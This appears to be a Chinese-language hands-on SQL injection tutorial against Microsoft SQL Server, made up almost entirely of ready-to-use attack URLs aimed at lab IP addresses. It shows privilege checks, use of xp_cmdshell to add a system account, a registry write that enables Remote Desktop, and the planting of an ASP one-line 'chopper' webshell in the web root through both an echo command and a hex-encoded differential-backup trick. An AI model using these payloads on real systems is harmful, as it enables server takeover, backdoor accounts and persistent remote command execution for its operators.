sql注入实战

1、注入点判断 ‘ 与and 1=1 1=2 与and exists (select * from sysobjects)

2、判断权限

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

and 1=(select is_srvrolemember('db_owner'))

and 1=(select is_srvrolemember('public'))

3、如果是sa权限并已恢复master..xp_cmdshell可以直接执行

http://192.168.0.103:86/sqlserver/1.aspx?xxser=1;exec%20master..xp_cmdshell%20%27net%20user%20test%20test%20/add%27

假如数据库服务器已经开启远终端服务，允许用户远程管理计算机，可以直接用存储过程执行系统命令添加一个管理员账号，即可登录服务器。如果没有开启，可直接使用以下命令开启（注0改1就是关闭）：

http://192.168.1.55/sqlserver/1.aspx?xxser=1;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

4、如果不具备sa权限，是dbowner权限

获取网站路径第一种方法

http://192.168.1.55/sqlserver/1.aspx?xxser=1%20;exec%20master..xp_cmdshell%20'netstat%20-an%20>>c:\netstat.txt'

第二种方法

http://192.168.1.55/sqlserver/1.aspx?xxser=1;drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--

http://192.168.1.55/sqlserver/1.aspx?xxser=1 ;insert into black exec master..xp_cmdshell 'dir c:\ '--

http://192.168.1.55/sqlserver/1.aspx?xxser=1 and (select result from black where id=1)>0--

把一句话木马写入到网站根目录下面：

http://192.168.0.105/sqlserver/1.aspx?xxser=1%20;exec%20master..xp_cmdshell%20'Echo%20"<%eval%20request("chopper")%>"%20>>%20c:\wwwtest\iis-xxser.com--wwwroot\muma.asp'-

如果报错，可以用exec sp_configure 'Web AssistantProcedures', 1; RECONFIGURE 进行恢复，恢复还不行，换成前面的方法或者差异备份方法都可以http://192.168.0.102/sqlserver/1.aspx?xxser=1%20;exec%20master..xp_cmdshell%20'Echo%20"<%eval%20request("chopper")%>"%20>>%20c:\wwwtest\iis-xxser.com--wwwroot\muma.asp'--

通过工具或手工直接差异备份获取webshell

http://192.168.0.102/sqlserver/1.aspx?xxser=1;alter database testdb set RECOVERY FULL;create table test_tmp(str image);backup log testdb to disk='c:\test1' with init;insert into test_tmp(str) values (0x3C2565786375746528726571756573742822636D64222929253E);backup log testdb to disk='C:\wwwtest\iis-xxser.com--wwwroot\yjh.asp';alter database testdb set RECOVERY simple